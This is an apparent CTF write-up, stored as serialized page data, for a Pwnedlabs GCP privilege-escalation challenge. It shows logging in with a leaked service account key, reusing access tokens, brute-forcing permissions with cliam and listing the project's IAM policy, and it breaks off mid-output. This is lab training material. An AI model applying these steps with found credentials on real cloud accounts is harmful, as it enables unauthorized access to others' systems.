[{"data":1,"prerenderedAt":52782},["ShallowReactive",2],{"writeups":3},[4,5246,11492,22447,25207,29228,35017,40191,43349,45388],{"_path":5,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":9,"description":8,"head":10,"body":29,"_type":5240,"_id":5241,"_source":5242,"_file":5243,"_stem":5244,"_extension":5245},"/writeups/pwnedlabs-gcp-challenge","writeups",false,"","Pwnedlabs GCP Challenge",{"title":9,"description":11,"keywords":12,"slug":13,"image":14,"date":15,"meta":16},"This challenge was released as part of a presentation made for the launch of Pwnedlabs' GCRTP bootcamp.","cloud,GCP,Privesc","pwnedlabs-gcp-challenge","https://res.cloudinary.com/dmju5zuhr/image/upload/v1743721051/writeups/pwnedlabs.webp","2025-04-02",[17,18,19,20,22,24,25,27],{"og:image":14},{"og:title":9},{"og:description":11},{"og:type":21},"article",{"og:url":23},"https://owalid.com/pwnedlabs-gcp-challenge",{"description":11},{"title":26},"Pwnedlabs GCP Challenge writeup",{"keywords":28},"cloud,GCP,Privesc,writeups,pwnedlabs,ctf",{"type":30,"children":31,"toc":5232},"root",[32,39,46,63,69,74,80,87,94,99,113,155,160,197,203,216,228,233,238,268,285,360,369,401,422,446,452,457,471,587,592,598,603,608,626,631,855,860,1339,1344,1349,1372,1377,1382,1425,1554,1559,1773,1778,1783,1787,1799,1803,1808,1814,1828,1833,1854,1859,1864,1869,1905,2016,2020,2208,2213,2226,2230,2257,2261,2266,2270,2290,2296,2312,2317,2350,2362,2381,2386,2549,2554,2670,2675,2729,2754,2759,2792,2797,2860,2865,3006,3018,3629,3634,4364,4369,4607,4612,4618,4623,4628,4646,4680,4685,5086,5097,5168,5181,5221,5226],{"type":33,"tag":34,"props":35,"children":36},"element","h1",{"id":13},[37],{"type":38,"value":9},"text",{"type":33,"tag":40,"props":41,"children":43},"h2",{"id":42},"introduction",[44],{"type":38,"value":45},"Introduction",{"type":33,"tag":47,"props":48,"children":49},"p",{},[50,52,61],{"type":38,"value":51},"This challenge was released as part of a presentation made for the launch of ",{"type":33,"tag":53,"props":54,"children":58},"a",{"href":55,"rel":56},"https://pwnedlabs.io/",[57],"nofollow",[59],{"type":38,"value":60},"Pwnedlabs",{"type":38,"value":62},"' GCRTP bootcamp, where the first person to solve the challenge would win a voucher for the bootcamp, and I was lucky enough to get first blood on this challenge.",{"type":33,"tag":40,"props":64,"children":66},{"id":65},"starting-point",[67],{"type":38,"value":68},"Starting Point",{"type":33,"tag":47,"props":70,"children":71},{},[72],{"type":38,"value":73},"We begin our challenge with a URL that redirects us to a Google Drive page containing a GCP key in JSON format.",{"type":33,"tag":75,"props":76,"children":79},"custom-image",{"imgSrc":77,":width":78},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743698095/writeups/pwnedlabs-gcp-challenge/first-key.webp","1000",[],{"type":33,"tag":81,"props":82,"children":84},"h3",{"id":83},"authentication-methods-for-the-gcloud-sdk",[85],{"type":38,"value":86},"Authentication methods for the gcloud SDK",{"type":33,"tag":88,"props":89,"children":91},"h4",{"id":90},"service-account-key",[92],{"type":38,"value":93},"Service Account Key",{"type":33,"tag":47,"props":95,"children":96},{},[97],{"type":38,"value":98},"This is a JSON file containing credentials for a service account as described in the previous image, it is commonly used in scripts, CI/CD deployments, servers, etc.",{"type":33,"tag":47,"props":100,"children":101},{},[102,104,111],{"type":38,"value":103},"To use the key, we can use the ",{"type":33,"tag":105,"props":106,"children":108},"code",{"className":107},[],[109],{"type":38,"value":110},"gcloud",{"type":38,"value":112}," command line tool to authenticate with the service account using the following command:",{"type":33,"tag":114,"props":115,"children":117},"code-card",{"lang":116},"bash",[118],{"type":33,"tag":119,"props":120,"children":123},"pre",{"className":121,"code":122,"language":116,"meta":8,"style":8},"language-bash shiki shiki-themes vitesse-dark","gcloud auth activate-service-account --key-file=key.json\n",[124],{"type":33,"tag":105,"props":125,"children":126},{"__ignoreMap":8},[127],{"type":33,"tag":128,"props":129,"children":132},"span",{"class":130,"line":131},"line",1,[133,138,144,149],{"type":33,"tag":128,"props":134,"children":136},{"style":135},"--shiki-default:#80A665",[137],{"type":38,"value":110},{"type":33,"tag":128,"props":139,"children":141},{"style":140},"--shiki-default:#C98A7D",[142],{"type":38,"value":143}," auth",{"type":33,"tag":128,"props":145,"children":146},{"style":140},[147],{"type":38,"value":148}," activate-service-account",{"type":33,"tag":128,"props":150,"children":152},{"style":151},"--shiki-default:#C99076",[153],{"type":38,"value":154}," --key-file=key.json\n",{"type":33,"tag":47,"props":156,"children":157},{},[158],{"type":38,"value":159},"After authenticating, we can set the project to the one associated with the service account using:",{"type":33,"tag":114,"props":161,"children":162},{"lang":116},[163],{"type":33,"tag":119,"props":164,"children":166},{"className":121,"code":165,"language":116,"meta":8,"style":8},"gcloud config set project gr-proj-4\n",[167],{"type":33,"tag":105,"props":168,"children":169},{"__ignoreMap":8},[170],{"type":33,"tag":128,"props":171,"children":172},{"class":130,"line":131},[173,177,182,187,192],{"type":33,"tag":128,"props":174,"children":175},{"style":135},[176],{"type":38,"value":110},{"type":33,"tag":128,"props":178,"children":179},{"style":140},[180],{"type":38,"value":181}," config",{"type":33,"tag":128,"props":183,"children":184},{"style":140},[185],{"type":38,"value":186}," set",{"type":33,"tag":128,"props":188,"children":189},{"style":140},[190],{"type":38,"value":191}," project",{"type":33,"tag":128,"props":193,"children":194},{"style":140},[195],{"type":38,"value":196}," gr-proj-4\n",{"type":33,"tag":88,"props":198,"children":200},{"id":199},"access-token",[201],{"type":38,"value":202},"Access Token",{"type":33,"tag":47,"props":204,"children":205},{},[206,208,214],{"type":38,"value":207},"An Access Token is a temporary access token (generally valid for 1h) used to prove your identity to Google APIs. It has a specific format and will always start with ",{"type":33,"tag":105,"props":209,"children":211},{"className":210},[],[212],{"type":38,"value":213},"ya29.",{"type":38,"value":215},".",{"type":33,"tag":47,"props":217,"children":218},{},[219,221,227],{"type":38,"value":220},"It can be retrieved when connected to the SDK using the command: ",{"type":33,"tag":105,"props":222,"children":224},{"className":223},[],[225],{"type":38,"value":226},"gcloud auth print-access-token",{"type":38,"value":215},{"type":33,"tag":47,"props":229,"children":230},{},[231],{"type":38,"value":232},"Additionally, certain account compromise paths allow us, as a service account, to retrieve an access token from another service account. This will allow us to interact with the compromised account, as we will see later in the writeup.",{"type":33,"tag":47,"props":234,"children":235},{},[236],{"type":38,"value":237},"The access token can be used in two possible ways:",{"type":33,"tag":239,"props":240,"children":241},"ul",{},[242,256],{"type":33,"tag":243,"props":244,"children":245},"li",{},[246,248,254],{"type":38,"value":247},"By interacting directly with Google APIs by specifying it in an ",{"type":33,"tag":105,"props":249,"children":251},{"className":250},[],[252],{"type":38,"value":253},"Authorization bearer",{"type":38,"value":255}," header.",{"type":33,"tag":243,"props":257,"children":258},{},[259,261,266],{"type":38,"value":260},"Or to use it with the ",{"type":33,"tag":105,"props":262,"children":264},{"className":263},[],[265],{"type":38,"value":110},{"type":38,"value":267}," SDK, here are the steps to follow:",{"type":33,"tag":269,"props":270,"children":271},"ol",{},[272],{"type":33,"tag":243,"props":273,"children":274},{},[275,277,283],{"type":38,"value":276},"Set the access token in the environment variable ",{"type":33,"tag":105,"props":278,"children":280},{"className":279},[],[281],{"type":38,"value":282},"CLOUDSDK_AUTH_ACCESS_TOKEN",{"type":38,"value":284},":",{"type":33,"tag":114,"props":286,"children":287},{"lang":116},[288],{"type":33,"tag":119,"props":289,"children":291},{"className":121,"code":290,"language":116,"meta":8,"style":8},"export CLOUDSDK_AUTH_ACCESS_TOKEN=ya29.c.c0ASRK0Gbjv4[...SNIP...]irRX3JRyQrz1rS3xqVc8\n",[292],{"type":33,"tag":105,"props":293,"children":294},{"__ignoreMap":8},[295],{"type":33,"tag":128,"props":296,"children":297},{"class":130,"line":131},[298,304,310,316,321,326,331,335,340,345,350,355],{"type":33,"tag":128,"props":299,"children":301},{"style":300},"--shiki-default:#CB7676",[302],{"type":38,"value":303},"export",{"type":33,"tag":128,"props":305,"children":307},{"style":306},"--shiki-default:#BD976A",[308],{"type":38,"value":309}," CLOUDSDK_AUTH_ACCESS_TOKEN",{"type":33,"tag":128,"props":311,"children":313},{"style":312},"--shiki-default:#666666",[314],{"type":38,"value":315},"=",{"type":33,"tag":128,"props":317,"children":318},{"style":306},[319],{"type":38,"value":320},"ya29",{"type":33,"tag":128,"props":322,"children":324},{"style":323},"--shiki-default:#DBD7CAEE",[325],{"type":38,"value":215},{"type":33,"tag":128,"props":327,"children":328},{"style":306},[329],{"type":38,"value":330},"c",{"type":33,"tag":128,"props":332,"children":333},{"style":323},[334],{"type":38,"value":215},{"type":33,"tag":128,"props":336,"children":337},{"style":306},[338],{"type":38,"value":339},"c0ASRK0Gbjv4",{"type":33,"tag":128,"props":341,"children":342},{"style":312},[343],{"type":38,"value":344},"[",{"type":33,"tag":128,"props":346,"children":347},{"style":323},[348],{"type":38,"value":349},"...SNIP...",{"type":33,"tag":128,"props":351,"children":352},{"style":312},[353],{"type":38,"value":354},"]",{"type":33,"tag":128,"props":356,"children":357},{"style":306},[358],{"type":38,"value":359},"irRX3JRyQrz1rS3xqVc8\n",{"type":33,"tag":269,"props":361,"children":363},{"start":362},2,[364],{"type":33,"tag":243,"props":365,"children":366},{},[367],{"type":38,"value":368},"Set the project to the one associated with the service account using:",{"type":33,"tag":114,"props":370,"children":371},{"lang":116},[372],{"type":33,"tag":119,"props":373,"children":374},{"className":121,"code":165,"language":116,"meta":8,"style":8},[375],{"type":33,"tag":105,"props":376,"children":377},{"__ignoreMap":8},[378],{"type":33,"tag":128,"props":379,"children":380},{"class":130,"line":131},[381,385,389,393,397],{"type":33,"tag":128,"props":382,"children":383},{"style":135},[384],{"type":38,"value":110},{"type":33,"tag":128,"props":386,"children":387},{"style":140},[388],{"type":38,"value":181},{"type":33,"tag":128,"props":390,"children":391},{"style":140},[392],{"type":38,"value":186},{"type":33,"tag":128,"props":394,"children":395},{"style":140},[396],{"type":38,"value":191},{"type":33,"tag":128,"props":398,"children":399},{"style":140},[400],{"type":38,"value":196},{"type":33,"tag":269,"props":402,"children":404},{"start":403},3,[405,417],{"type":33,"tag":243,"props":406,"children":407},{},[408,410,415],{"type":38,"value":409},"Use the ",{"type":33,"tag":105,"props":411,"children":413},{"className":412},[],[414],{"type":38,"value":110},{"type":38,"value":416}," command as usual, and it will automatically use the access token for authentication.",{"type":33,"tag":243,"props":418,"children":419},{},[420],{"type":38,"value":421},"To unset the access token, you can use the command:",{"type":33,"tag":114,"props":423,"children":424},{"lang":116},[425],{"type":33,"tag":119,"props":426,"children":428},{"className":121,"code":427,"language":116,"meta":8,"style":8},"unset CLOUDSDK_AUTH_ACCESS_TOKEN\n",[429],{"type":33,"tag":105,"props":430,"children":431},{"__ignoreMap":8},[432],{"type":33,"tag":128,"props":433,"children":434},{"class":130,"line":131},[435,441],{"type":33,"tag":128,"props":436,"children":438},{"style":437},"--shiki-default:#B8A965",[439],{"type":38,"value":440},"unset",{"type":33,"tag":128,"props":442,"children":443},{"style":140},[444],{"type":38,"value":445}," CLOUDSDK_AUTH_ACCESS_TOKEN\n",{"type":33,"tag":40,"props":447,"children":449},{"id":448},"enumeration",[450],{"type":38,"value":451},"Enumeration",{"type":33,"tag":47,"props":453,"children":454},{},[455],{"type":38,"value":456},"From here, we have no information, so we need to proceed with enumerating our service account. To start, we'll examine what our service account can do and subsequently how our service account can interact with other service accounts.",{"type":33,"tag":47,"props":458,"children":459},{},[460,462,469],{"type":38,"value":461},"With ",{"type":33,"tag":53,"props":463,"children":466},{"href":464,"rel":465},"https://github.com/securisec/cliam",[57],[467],{"type":38,"value":468},"cliam",{"type":38,"value":470}," it is possible to brute force the actions that our service account is capable of performing.",{"type":33,"tag":114,"props":472,"children":473},{"lang":116},[474],{"type":33,"tag":119,"props":475,"children":477},{"className":121,"code":476,"language":116,"meta":8,"style":8},"cliam gcp --service-account=key.json --project-id gr-proj-4 bruteforce\nApr 04 00:34:58 DBG ● project=gr-proj-4 region=us-central1 zone=us-central1-a\nApr 04 00:35:06 INF ● resourcemanager.projects=get-iam-policy\n",[478],{"type":33,"tag":105,"props":479,"children":480},{"__ignoreMap":8},[481,513,557],{"type":33,"tag":128,"props":482,"children":483},{"class":130,"line":131},[484,488,493,498,503,508],{"type":33,"tag":128,"props":485,"children":486},{"style":135},[487],{"type":38,"value":468},{"type":33,"tag":128,"props":489,"children":490},{"style":140},[491],{"type":38,"value":492}," gcp",{"type":33,"tag":128,"props":494,"children":495},{"style":151},[496],{"type":38,"value":497}," --service-account=key.json",{"type":33,"tag":128,"props":499,"children":500},{"style":151},[501],{"type":38,"value":502}," --project-id",{"type":33,"tag":128,"props":504,"children":505},{"style":140},[506],{"type":38,"value":507}," gr-proj-4",{"type":33,"tag":128,"props":509,"children":510},{"style":140},[511],{"type":38,"value":512}," bruteforce\n",{"type":33,"tag":128,"props":514,"children":515},{"class":130,"line":362},[516,521,527,532,537,542,547,552],{"type":33,"tag":128,"props":517,"children":518},{"style":135},[519],{"type":38,"value":520},"Apr",{"type":33,"tag":128,"props":522,"children":524},{"style":523},"--shiki-default:#4C9A91",[525],{"type":38,"value":526}," 04",{"type":33,"tag":128,"props":528,"children":529},{"style":140},[530],{"type":38,"value":531}," 00:34:58",{"type":33,"tag":128,"props":533,"children":534},{"style":140},[535],{"type":38,"value":536}," DBG",{"type":33,"tag":128,"props":538,"children":539},{"style":140},[540],{"type":38,"value":541}," ●",{"type":33,"tag":128,"props":543,"children":544},{"style":140},[545],{"type":38,"value":546}," project=gr-proj-4",{"type":33,"tag":128,"props":548,"children":549},{"style":140},[550],{"type":38,"value":551}," region=us-central1",{"type":33,"tag":128,"props":553,"children":554},{"style":140},[555],{"type":38,"value":556}," zone=us-central1-a\n",{"type":33,"tag":128,"props":558,"children":559},{"class":130,"line":403},[560,564,568,573,578,582],{"type":33,"tag":128,"props":561,"children":562},{"style":135},[563],{"type":38,"value":520},{"type":33,"tag":128,"props":565,"children":566},{"style":523},[567],{"type":38,"value":526},{"type":33,"tag":128,"props":569,"children":570},{"style":140},[571],{"type":38,"value":572}," 00:35:06",{"type":33,"tag":128,"props":574,"children":575},{"style":140},[576],{"type":38,"value":577}," INF",{"type":33,"tag":128,"props":579,"children":580},{"style":140},[581],{"type":38,"value":541},{"type":33,"tag":128,"props":583,"children":584},{"style":140},[585],{"type":38,"value":586}," resourcemanager.projects=get-iam-policy\n",{"type":33,"tag":47,"props":588,"children":589},{},[590],{"type":38,"value":591},"After our enumeration we can see that our user can list IAM policies.",{"type":33,"tag":81,"props":593,"children":595},{"id":594},"how-iam-policies-work-on-gcp",[596],{"type":38,"value":597},"How iam policies work on GCP ?",{"type":33,"tag":47,"props":599,"children":600},{},[601],{"type":38,"value":602},"In GCP, an IAM Policy is a set of rules that define who can do what on which resource. It controls access by assigning roles to members on specific resources.",{"type":33,"tag":47,"props":604,"children":605},{},[606],{"type":38,"value":607},"An IAM Policy consists of bindings that associate:",{"type":33,"tag":239,"props":609,"children":610},{},[611,616,621],{"type":33,"tag":243,"props":612,"children":613},{},[614],{"type":38,"value":615},"One or more members (users, groups, service accounts)",{"type":33,"tag":243,"props":617,"children":618},{},[619],{"type":38,"value":620},"A role (predefined or custom)",{"type":33,"tag":243,"props":622,"children":623},{},[624],{"type":38,"value":625},"A condition (optional, to restrict access based on criteria)",{"type":33,"tag":47,"props":627,"children":628},{},[629],{"type":38,"value":630},"Here is an example of an IAM Policy (JSON):",{"type":33,"tag":114,"props":632,"children":634},{"lang":633},"json",[635],{"type":33,"tag":119,"props":636,"children":639},{"className":637,"code":638,"language":633,"meta":8,"style":8},"language-json shiki shiki-themes vitesse-dark","{\n \"role\": \"roles/storage.objectViewer\",\n \"members\": [\"user:alice@example.com\"],\n \"condition\": {\n \"title\": \"TemporaryAccess\",\n \"expression\": \"request.time \u003C timestamp('2025-01-01T00:00:00Z')\"\n }\n}\n",[640],{"type":33,"tag":105,"props":641,"children":642},{"__ignoreMap":8},[643,651,694,737,763,802,837,846],{"type":33,"tag":128,"props":644,"children":645},{"class":130,"line":131},[646],{"type":33,"tag":128,"props":647,"children":648},{"style":312},[649],{"type":38,"value":650},"{\n",{"type":33,"tag":128,"props":652,"children":653},{"class":130,"line":362},[654,660,665,670,674,680,685,689],{"type":33,"tag":128,"props":655,"children":657},{"style":656},"--shiki-default:#B8A96577",[658],{"type":38,"value":659}," \"",{"type":33,"tag":128,"props":661,"children":662},{"style":437},[663],{"type":38,"value":664},"role",{"type":33,"tag":128,"props":666,"children":667},{"style":656},[668],{"type":38,"value":669},"\"",{"type":33,"tag":128,"props":671,"children":672},{"style":312},[673],{"type":38,"value":284},{"type":33,"tag":128,"props":675,"children":677},{"style":676},"--shiki-default:#C98A7D77",[678],{"type":38,"value":679}," \"",{"type":33,"tag":128,"props":681,"children":682},{"style":140},[683],{"type":38,"value":684},"roles/storage.objectViewer",{"type":33,"tag":128,"props":686,"children":687},{"style":676},[688],{"type":38,"value":669},{"type":33,"tag":128,"props":690,"children":691},{"style":312},[692],{"type":38,"value":693},",\n",{"type":33,"tag":128,"props":695,"children":696},{"class":130,"line":403},[697,701,706,710,714,719,723,728,732],{"type":33,"tag":128,"props":698,"children":699},{"style":656},[700],{"type":38,"value":659},{"type":33,"tag":128,"props":702,"children":703},{"style":437},[704],{"type":38,"value":705},"members",{"type":33,"tag":128,"props":707,"children":708},{"style":656},[709],{"type":38,"value":669},{"type":33,"tag":128,"props":711,"children":712},{"style":312},[713],{"type":38,"value":284},{"type":33,"tag":128,"props":715,"children":716},{"style":312},[717],{"type":38,"value":718}," [",{"type":33,"tag":128,"props":720,"children":721},{"style":676},[722],{"type":38,"value":669},{"type":33,"tag":128,"props":724,"children":725},{"style":140},[726],{"type":38,"value":727},"user:alice@example.com",{"type":33,"tag":128,"props":729,"children":730},{"style":676},[731],{"type":38,"value":669},{"type":33,"tag":128,"props":733,"children":734},{"style":312},[735],{"type":38,"value":736},"],\n",{"type":33,"tag":128,"props":738,"children":740},{"class":130,"line":739},4,[741,745,750,754,758],{"type":33,"tag":128,"props":742,"children":743},{"style":656},[744],{"type":38,"value":659},{"type":33,"tag":128,"props":746,"children":747},{"style":437},[748],{"type":38,"value":749},"condition",{"type":33,"tag":128,"props":751,"children":752},{"style":656},[753],{"type":38,"value":669},{"type":33,"tag":128,"props":755,"children":756},{"style":312},[757],{"type":38,"value":284},{"type":33,"tag":128,"props":759,"children":760},{"style":312},[761],{"type":38,"value":762}," {\n",{"type":33,"tag":128,"props":764,"children":766},{"class":130,"line":765},5,[767,772,777,781,785,789,794,798],{"type":33,"tag":128,"props":768,"children":769},{"style":656},[770],{"type":38,"value":771}," \"",{"type":33,"tag":128,"props":773,"children":774},{"style":437},[775],{"type":38,"value":776},"title",{"type":33,"tag":128,"props":778,"children":779},{"style":656},[780],{"type":38,"value":669},{"type":33,"tag":128,"props":782,"children":783},{"style":312},[784],{"type":38,"value":284},{"type":33,"tag":128,"props":786,"children":787},{"style":676},[788],{"type":38,"value":679},{"type":33,"tag":128,"props":790,"children":791},{"style":140},[792],{"type":38,"value":793},"TemporaryAccess",{"type":33,"tag":128,"props":795,"children":796},{"style":676},[797],{"type":38,"value":669},{"type":33,"tag":128,"props":799,"children":800},{"style":312},[801],{"type":38,"value":693},{"type":33,"tag":128,"props":803,"children":805},{"class":130,"line":804},6,[806,810,815,819,823,827,832],{"type":33,"tag":128,"props":807,"children":808},{"style":656},[809],{"type":38,"value":771},{"type":33,"tag":128,"props":811,"children":812},{"style":437},[813],{"type":38,"value":814},"expression",{"type":33,"tag":128,"props":816,"children":817},{"style":656},[818],{"type":38,"value":669},{"type":33,"tag":128,"props":820,"children":821},{"style":312},[822],{"type":38,"value":284},{"type":33,"tag":128,"props":824,"children":825},{"style":676},[826],{"type":38,"value":679},{"type":33,"tag":128,"props":828,"children":829},{"style":140},[830],{"type":38,"value":831},"request.time \u003C timestamp('2025-01-01T00:00:00Z')",{"type":33,"tag":128,"props":833,"children":834},{"style":676},[835],{"type":38,"value":836},"\"\n",{"type":33,"tag":128,"props":838,"children":840},{"class":130,"line":839},7,[841],{"type":33,"tag":128,"props":842,"children":843},{"style":312},[844],{"type":38,"value":845}," }\n",{"type":33,"tag":128,"props":847,"children":849},{"class":130,"line":848},8,[850],{"type":33,"tag":128,"props":851,"children":852},{"style":312},[853],{"type":38,"value":854},"}\n",{"type":33,"tag":47,"props":856,"children":857},{},[858],{"type":38,"value":859},"Listing IAM policies allows us to gain more insights into the permissions and names of users or service accounts that could be used - this is important information for exploiting attack paths to another account.",{"type":33,"tag":114,"props":861,"children":862},{"lang":116},[863],{"type":33,"tag":119,"props":864,"children":866},{"className":121,"code":865,"language":116,"meta":8,"style":8},"gcloud projects get-iam-policy gr-proj-4\n\n- members:\n - serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n role: projects/gr-proj-4/roles/PaymentsStorage\n- members:\n - serviceAccount:staging@gr-proj-4.iam.gserviceaccount.com\n role: projects/gr-proj-4/roles/Staging2\n- members:\n - serviceAccount:analytics@gr-proj-4.iam.gserviceaccount.com\n role: roles/analyticshub.viewer\n- members:\n - serviceAccount:analytics@gr-proj-4.iam.gserviceaccount.com\n role: roles/bigquery.dataViewer\n- members:\n - serviceAccount:sql-424@gr-proj-4.iam.gserviceaccount.com\n role: roles/cloudsql.viewer\n- members:\n - serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n role: roles/compute.viewer\n- members:\n - user:ian@pwnedlabs.io\n role: roles/owner\n- members:\n - serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n role: roles/run.invoker\n- members:\n - serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n role: roles/secretmanager.viewer\n- members:\n - serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n role: roles/storage.bucketViewer\n- members:\n - serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n role: roles/storage.objectViewer\netag: BwYxzfQaKR4=\nversion: 1\n",[867],{"type":33,"tag":105,"props":868,"children":869},{"__ignoreMap":8},[870,891,900,913,926,939,950,962,974,986,999,1012,1024,1036,1049,1061,1074,1087,1099,1112,1125,1137,1150,1163,1175,1187,1200,1212,1224,1237,1249,1261,1274,1286,1298,1311,1325],{"type":33,"tag":128,"props":871,"children":872},{"class":130,"line":131},[873,877,882,887],{"type":33,"tag":128,"props":874,"children":875},{"style":135},[876],{"type":38,"value":110},{"type":33,"tag":128,"props":878,"children":879},{"style":140},[880],{"type":38,"value":881}," projects",{"type":33,"tag":128,"props":883,"children":884},{"style":140},[885],{"type":38,"value":886}," get-iam-policy",{"type":33,"tag":128,"props":888,"children":889},{"style":140},[890],{"type":38,"value":196},{"type":33,"tag":128,"props":892,"children":893},{"class":130,"line":362},[894],{"type":33,"tag":128,"props":895,"children":897},{"emptyLinePlaceholder":896},true,[898],{"type":38,"value":899},"\n",{"type":33,"tag":128,"props":901,"children":902},{"class":130,"line":403},[903,908],{"type":33,"tag":128,"props":904,"children":905},{"style":135},[906],{"type":38,"value":907},"-",{"type":33,"tag":128,"props":909,"children":910},{"style":140},[911],{"type":38,"value":912}," members:\n",{"type":33,"tag":128,"props":914,"children":915},{"class":130,"line":739},[916,921],{"type":33,"tag":128,"props":917,"children":918},{"style":135},[919],{"type":38,"value":920}," -",{"type":33,"tag":128,"props":922,"children":923},{"style":140},[924],{"type":38,"value":925}," serviceAccount:payments@gr-proj-4.iam.gserviceaccount.com\n",{"type":33,"tag":128,"props":927,"children":928},{"class":130,"line":765},[929,934],{"type":33,"tag":128,"props":930,"children":931},{"style":135},[932],{"type":38,"value":933}," role:",{"type":33,"tag":128,"props":935,"children":936},{"style":140},[937],{"type":38,"value":938}," projects/gr-proj-4/roles/PaymentsStorage\n",{"type":33,"tag":128,"props":940,"children":941},{"class":130,"line":804},[942,946],{"type":33,"tag":128,"props":943,"children":944},{"style":135},[945],{"type":38,"value":907},{"type":33,"tag":128,"props":947,"children":948},{"style":140},[949],{"type":38,"value":912},{"type":33,"tag":128,"props":951,"children":952},{"class":130,"line":839},[953,957],{"type":33,"tag":128,"props":954,"children":955},{"style":135},[956],{"type":38,"value":920},{"type":33,"tag":128,"props":958,"children":959},{"style":140},[960],{"type":38,"value":961}," serviceAccount:staging@gr-proj-4.iam.gserviceaccount.com\n",{"type":33,"tag":128,"props":963,"children":964},{"class":130,"line":848},[965,969],{"type":33,"tag":128,"props":966,"children":967},{"style":135},[968],{"type":38,"value":933},{"type":33,"tag":128,"props":970,"children":971},{"style":140},[972],{"type":38,"value":973}," projects/gr-proj-4/roles/Staging2\n",{"type":33,"tag":128,"props":975,"children":977},{"class":130,"line":976},9,[978,982],{"type":33,"tag":128,"props":979,"children":980},{"style":135},[981],{"type":38,"value":907},{"type":33,"tag":128,"props":983,"children":984},{"style":140},[985],{"type":38,"value":912},{"type":33,"tag":128,"props":987,"children":989},{"class":130,"line":988},10,[990,994],{"type":33,"tag":128,"props":991,"children":992},{"style":135},[993],{"type":38,"value":920},{"type":33,"tag":128,"props":995,"children":996},{"style":140},[997],{"type":38,"value":998}," serviceAccount:analytics@gr-proj-4.iam.gserviceaccount.com\n",{"type":33,"tag":128,"props":1000,"children":1002},{"class":130,"line":1001},11,[1003,1007],{"type":33,"tag":128,"props":1004,"children":1005},{"style":135},[1006],{"type":38,"value":933},{"type":33,"tag":128,"props":1008,"children":1009},{"style":140},[1010],{"type":38,"value":1011}," roles/analyticshub.viewer\n",{"type":33,"tag":128,"props":1013,"children":1015},{"class":130,"line":1014},12,[1016,1020],{"type":33,"tag":128,"props":1017,"children":1018},{"style":135},[1019],{"type":38,"value":907},{"type":33,"tag":128,"props":1021,"children":1022},{"style":140},[1023],{"type":38,"value":912},{"type":33,"tag":128,"props":1025,"children":1027},{"class":130,"line":1026},13,[1028,1032],{"type":33,"tag":128,"props":1029,"children":1030},{"style":135},[1031],{"type":38,"value":920},{"type":33,"tag":128,"props":1033,"children":1034},{"style":140},[1035],{"type":38,"value":998},{"type":33,"tag":128,"props":1037,"children":1039},{"class":130,"line":1038},14,[1040,1044],{"type":33,"tag":128,"props":1041,"children":1042},{"style":135},[1043],{"type":38,"value":933},{"type":33,"tag":128,"props":1045,"children":1046},{"style":140},[1047],{"type":38,"value":1048}," roles/bigquery.dataViewer\n",{"type":33,"tag":128,"props":1050,"children":1052},{"class":130,"line":1051},15,[1053,1057],{"type":33,"tag":128,"props":1054,"children":1055},{"style":135},[1056],{"type":38,"value":907},{"type":33,"tag":128,"props":1058,"children":1059},{"style":140},[1060],{"type":38,"value":912},{"type":33,"tag":128,"props":1062,"children":1064},{"class":130,"line":1063},16,[1065,1069],{"type":33,"tag":128,"props":1066,"children":1067},{"style":135},[1068],{"type":38,"value":920},{"type":33,"tag":128,"props":1070,"children":1071},{"style":140},[1072],{"type":38,"value":1073}," serviceAccount:sql-424@gr-proj-4.iam.gserviceaccount.com\n",{"type":33,"tag":128,"props":1075,"children":1077},{"class":130,"line":1076},17,[1078,1082],{"type":33,"tag":128,"props":1079,"children":1080},{"style":135},[1081],{"type":38,"value":933},{"type":33,"tag":128,"props":1083,"children":1084},{"style":140},[1085],{"type":38,"value":1086}," roles/cloudsql.viewer\n",{"type":33,"tag":128,"props":1088,"children":1090},{"class":130,"line":1089},18,[1091,1095],{"type":33,"tag":128,"props":1092,"children":1093},{"style":135},[1094],{"type":38,"value":907},{"type":33,"tag":128,"props":1096,"children":1097},{"style":140},[1098],{"type":38,"value":912},{"type":33,"tag":128,"props":1100,"children":1102},{"class":130,"line":1101},19,[1103,1107],{"type":33,"tag":128,"props":1104,"children":1105},{"style":135},[1106],{"type":38,"value":920},{"type":33,"tag":128,"props":1108,"children":1109},{"style":140},[1110],{"type":38,"value":1111}," serviceAccount:platform-middleware@gr-proj-4.iam.gserviceaccount.com\n",{"type":33,"tag":128,"props":1113,"children":1115},{"class":130,"line":1114},20,[1116,1120],{"type":33,"tag":128,"props":1117,"children":1118},{"style":135},[1119],{"type":38,"value":933},{"type":33,"tag":128,"props":1121,"children":1122},{"style":140},[1123],{"type":38,"value":1124}," roles/compute.viewer\n",{"type":33,"tag":128,"props":1126,"children":1128},{"class":130,"line":1127},21,[1129,1133],{"type":33,"tag":128,"props":1130,"children":1131},{"style":135},[1132],{"type":38,"value":907},{"type":33,"tag":128,"props":1134,"children":1135},{"style":140},[1136],{"type":38,"value":912},{"type":33,"tag":128,"props":1138,"children":1140},{"class":130,"line":1139},22,[1141,1145],{"type":33,"tag":128,"props":1142,"children":1143},{"style":135},[1144],{"type":38,"value":920},{"type":33,"tag":128,"props":1146,"children":1147},{"style":140},[1148],{"type":38,"value":1149}," user:ian@pwnedlabs.io\n",{"type":33,"tag":128,"props":1151,"children":1153},{"class":130,"line":1152},23,[1154,1158],{"type":33,"tag":128,"props":1155,"children":1156},{"style":135},[1157],{"type":38,"value":933},{"type":33,"tag":128,"props":1159,"children":1160},{"style":140},[1161],{"type":38,"value":1162}," 